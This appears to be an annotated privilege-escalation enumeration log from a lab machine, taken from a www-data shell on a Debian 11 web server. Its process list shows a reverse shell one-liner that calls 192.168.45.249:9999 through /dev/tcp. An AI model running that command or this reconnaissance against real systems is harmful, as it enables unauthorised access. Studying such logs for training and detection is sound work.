System/Kernel


www-data@debian:/$ uname -a ; cat /etc/*release
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
NAME="Debian GNU/Linux"
VERSION_ID="11"
VERSION="11 (bullseye)"
VERSION_CODENAME=bullseye
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
  • Kernel release: 5.10.0-25-amd64 (Debian 5.10.191-1, 2023-08-16)
  • Architecture: x86_64
  • Distribution: Debian GNU/Linux 11 (bullseye)

Networks


www-data@debian:/$ ip route ; arp -a
default via 192.168.201.254 dev ens192 onlink 
192.168.201.0/24 dev ens192 proto kernel scope link src 192.168.201.38 
? (192.168.201.254) at 00:50:56:9e:df:ab [ether] on ens192
www-data@debian:/$ netstat -antup
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0    140 192.168.201.38:58508    192.168.45.249:9999     ESTABLISHED 1315/bash           
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 192.168.201.38:80       192.168.45.249:59214    TIME_WAIT   -                   
tcp6       0      0 192.168.201.38:80       192.168.45.249:46410    TIME_WAIT   -                   
tcp6       0      0 192.168.201.38:80       192.168.45.249:59212    TIME_WAIT   -                   
tcp6       0      0 192.168.201.38:80       192.168.45.249:44710    TIME_WAIT   -                   
tcp6       0      0 192.168.201.38:80       192.168.45.249:59206    TIME_WAIT   -                   
tcp6       0      0 192.168.201.38:80       192.168.45.249:59218    ESTABLISHED -                   
udp        0      0 0.0.0.0:50755           0.0.0.0:*                           -                   

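tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
  • 3306 is bound to loopback only (presumably MariaDB, since mariadbd appears under Processes), so the database is not exposed to the network and is reachable only from a session on the host itself.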

Users & Groups


www-data@debian:/$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
skunk:x:1001:1001::/home/skunk:/bin/bash
total 12K
4.0K drwxr-xr-x  2 skunk skunk 4.0K Dec  8  2023 skunk
4.0K drwxr-xr-x  3 root  root  4.0K Dec  8  2023 .
4.0K drwxr-xr-x 18 root  root  4.0K Sep 19  2023 ..

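skunk — the only non-root account with an interactive shell (/bin/bash); /home/skunk is drwxr-xr-x, i.e. readable and traversable by every local user, including www-data.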

www-data@debian:/$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=102(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=103(messagebus) gid=109(messagebus) groups=109(messagebus)
uid=104(systemd-timesync) gid=110(systemd-timesync) groups=110(systemd-timesync)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(mysql) gid=112(mysql) groups=112(mysql)
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)

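uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
  • skunk is a member of sudo (27) and www-data (33): the one interactive user account also carries administrative rights, so its credentials are effectively root-equivalent, subject to the sudoers policy, which is not shown here.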

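SUIDs

Note: in the command below `-ls` comes before `-type f`, so find lists every path matching `-perm -04000` and only then evaluates `-type f`; the type test filters nothing. The SGID command in the next section puts `-type f -perm` ahead of `-ls`, which is the order that actually restricts the listing to regular files.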


www-data@debian:/$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
   136738     52 -rwsr-xr--   1 root     messagebus    51336 Oct  5  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   136305    472 -rwsr-xr-x   1 root     root         481608 Sep 23  2023 /usr/lib/openssh/ssh-keysign
   652890     52 -rwsr-xr-x   1 root     root          52880 Feb  7  2020 /usr/bin/chsh
   652889     60 -rwsr-xr-x   1 root     root          58416 Feb  7  2020 /usr/bin/chfn
   664617     36 -rwsr-xr-x   1 root     root          34896 Feb 26  2021 /usr/bin/fusermount
   656361     44 -rwsr-xr-x   1 root     root          44632 Feb  7  2020 /usr/bin/newgrp
   656796     36 -rwsr-xr-x   1 root     root          35040 Jan 20  2022 /usr/bin/umount
   652893     64 -rwsr-xr-x   1 root     root          63960 Feb  7  2020 /usr/bin/passwd
   656505     72 -rwsr-xr-x   1 root     root          71912 Jan 20  2022 /usr/bin/su
   652892     88 -rwsr-xr-x   1 root     root          88304 Feb  7  2020 /usr/bin/gpasswd
   656794     56 -rwsr-xr-x   1 root     root          55528 Jan 20  2022 /usr/bin/mount
   653183    180 -rwsr-xr-x   1 root     root         182600 Jan 14  2023 /usr/bin/sudo

SGIDs


www-data@debian:/$ find / -type f -perm -02000 -ls 2>/dev/null | grep -v '/snap'
   652873     40 -rwxr-sr-x   1 root     shadow      38912 Aug 26  2021 /usr/sbin/unix_chkpwd
   660667     24 -rwxr-sr-x   1 root     tty         22760 Jan 20  2022 /usr/bin/write.ul
   652888     80 -rwxr-sr-x   1 root     shadow      80256 Feb  7  2020 /usr/bin/chage
   662575     24 -rwxr-sr-x   1 root     mail        23040 Feb  4  2021 /usr/bin/dotlockfile
   657970     44 -rwxr-sr-x   1 root     crontab     43568 Feb 22  2021 /usr/bin/crontab
   657575    348 -rwxr-sr-x   1 root     ssh        354440 Sep 23  2023 /usr/bin/ssh-agent
   654299     36 -rwxr-sr-x   1 root     tty         35048 Jan 20  2022 /usr/bin/wall
   652891     32 -rwxr-sr-x   1 root     shadow      31160 Feb  7  2020 /usr/bin/expiry

Capabilities


www-data@debian:/$ getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep

Processes


www-data@debian:/$ ps -auxwww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.5 163696 10116 ?        Ss   06:55   0:00 /sbin/init
root         226  0.0  0.7  48396 14628 ?        Ss   06:55   0:00 /lib/systemd/systemd-journald
root         248  0.0  0.2  21716  5228 ?        Ss   06:55   0:00 /lib/systemd/systemd-udevd
systemd+     439  0.0  0.2  88436  5940 ?        Ssl  06:55   0:00 /lib/systemd/systemd-timesyncd
root         442  0.0  0.5  47748 10280 ?        Ss   06:55   0:00 /usr/bin/VGAuthService
root         443  0.0  0.5 163072 11552 ?        Ssl  06:55   0:01 /usr/bin/vmtoolsd
root         470  0.0  0.1   6744  2808 ?        Ss   06:55   0:00 /usr/sbin/cron -f
message+     471  0.0  0.2   8272  4132 ?        Ss   06:55   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         474  0.0  0.3 220796  6588 ?        Ssl  06:55   0:00 /usr/sbin/rsyslogd -n -iNONE
root         477  0.0  0.2  13400  5540 ?        Ss   06:55   0:00 /lib/systemd/systemd-logind
root         491  0.0  0.0   5844  1712 tty1     Ss+  06:55   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         502  0.0  0.3  13352  7128 ?        Ss   06:55   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
mysql        577  0.0  4.9 1411320 100464 ?      Ssl  06:55   0:00 /usr/sbin/mariadbd
root         605  0.0  1.2 209180 25344 ?        Ss   06:55   0:00 /usr/sbin/apache2 -k start
www-data     931  0.0  1.8 214796 37764 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data     932  0.0  1.8 214776 38304 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data     933  0.0  1.7 212672 35444 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data     934  0.0  1.7 212700 35480 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data     935  0.0  1.9 214888 40084 ?        S    06:57   0:00 /usr/sbin/apache2 -k start
www-data    1047  0.0  1.8 214564 37188 ?        S    06:58   0:00 /usr/sbin/apache2 -k start
www-data    1313  0.0  0.0   2480   576 ?        S    07:15   0:00 sh -c bash -c "bash -i >& \/dev\/tcp\/192.168.45.249\/9999 0>&1"
www-data    1314  0.0  0.1   3896  2896 ?        S    07:15   0:00 bash -c bash -i >& \/dev\/tcp\/192.168.45.249\/9999 0>&1
www-data    1315  0.0  0.1   4160  3400 ?        S    07:15   0:00 bash -i
www-data    1373  0.0  0.1   6932  3136 ?        R    07:16   0:00 ps -auxwww
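  • root 470 0.0 0.1 6744 2808 ? Ss 06:55 0:00 /usr/sbin/cron -f
  • mysql 577 0.0 4.9 1411320 100464 ? Ssl 06:55 0:00 /usr/sbin/mariadbd
  • www-data 1313–1315: the `sh -c` → `bash -c` → `bash -i` chain with /dev/tcp redirection is the shell this enumeration is running in (netstat above shows 1315/bash ESTABLISHED to 192.168.45.249:9999). For detection, a web-server account (www-data) owning an interactive bash with an outbound TCP connection is a high-signal event for process and network monitoring.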

Cron & Systemd


www-data@debian:/$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT                        LEFT        LAST                        PASSED               UNIT                         ACTIVATES
Sun 2025-04-06 07:21:08 EDT 5min left   Fri 2024-08-02 18:06:47 EDT 8 months 3 days ago  apt-daily-upgrade.timer      apt-daily-upgrade.service
Sun 2025-04-06 07:39:00 EDT 22min left  Sun 2025-04-06 07:09:01 EDT 7min ago             phpsessionclean.timer        phpsessionclean.service
Sun 2025-04-06 15:16:23 EDT 8h left     Fri 2023-12-08 10:51:41 EST 1 years 3 months ago apt-daily.timer              apt-daily.service
Mon 2025-04-07 00:00:00 EDT 16h left    Sun 2025-04-06 06:57:22 EDT 18min ago            logrotate.timer              logrotate.service
Mon 2025-04-07 00:00:00 EDT 16h left    Sun 2025-04-06 06:57:22 EDT 18min ago            man-db.timer                 man-db.service
Mon 2025-04-07 00:18:25 EDT 17h left    Sun 2025-04-06 06:59:16 EDT 16min ago            fstrim.timer                 fstrim.service
Mon 2025-04-07 07:10:14 EDT 23h left    Sun 2025-04-06 07:10:13 EDT 5min ago             systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2025-04-13 03:10:03 EDT 6 days left Sun 2025-04-06 06:57:22 EDT 18min ago            e2scrub_all.timer            e2scrub_all.service
 
8 timers listed.
Pass --all to see loaded but inactive timers, too.

Services


www-data@debian:/$ systemctl list-units --state=running
  UNIT                              LOAD   ACTIVE SUB     DESCRIPTION
  proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
  init.scope                        loaded active running System and Service Manager
  apache2.service                   loaded active running The Apache HTTP Server
  cron.service                      loaded active running Regular background program processing daemon
  dbus.service                      loaded active running D-Bus System Message Bus
  getty@tty1.service                loaded active running Getty on tty1
  mariadb.service                   loaded active running MariaDB 10.5.21 database server
  open-vm-tools.service             loaded active running Service for virtual machines hosted on VMware
  rsyslog.service                   loaded active running System Logging Service
  ssh.service                       loaded active running OpenBSD Secure Shell server
  systemd-journald.service          loaded active running Journal Service
  systemd-logind.service            loaded active running User Login Management
  systemd-timesyncd.service         loaded active running Network Time Synchronization
  systemd-udevd.service             loaded active running Rule-based Manager for Device Events and Files
  vgauth.service                    loaded active running Authentication service for virtual machines hosted on VMware
  dbus.socket                       loaded active running D-Bus System Message Bus Socket
  syslog.socket                     loaded active running Syslog Socket
  systemd-journald-audit.socket     loaded active running Journal Audit Socket
  systemd-journald-dev-log.socket   loaded active running Journal Socket (/dev/log)
  systemd-journald.socket           loaded active running Journal Socket
  systemd-udevd-control.socket      loaded active running udev Control Socket
  systemd-udevd-kernel.socket       loaded active running udev Kernel Socket
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
22 loaded units listed.
  • apache2.service (The Apache HTTP Server)
  • mariadb.service (MariaDB 10.5.21 database server)

Sudo Version


www-data@debian:/$ sudo --version
Sudo version 1.9.5p2
Sudoers policy plugin version 1.9.5p2
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.5p2
Sudoers audit plugin version 1.9.5p2

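Sudo version 1.9.5p2
  • Debian backports security fixes without changing the upstream version string, so 1.9.5p2 alone does not show which fixes are present; the package revision (`dpkg -s sudo`) is what to compare against Debian security advisories.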

Glibc Version


www-data@debian:/$ ldd --version
ldd (Debian GLIBC 2.31-13+deb11u6) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

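ldd (Debian GLIBC 2.31-13+deb11u6) 2.31
  • The Debian package revision (2.31-13+deb11u6), not the upstream 2.31, determines which security fixes are included; check it against the Debian security tracker for bullseye.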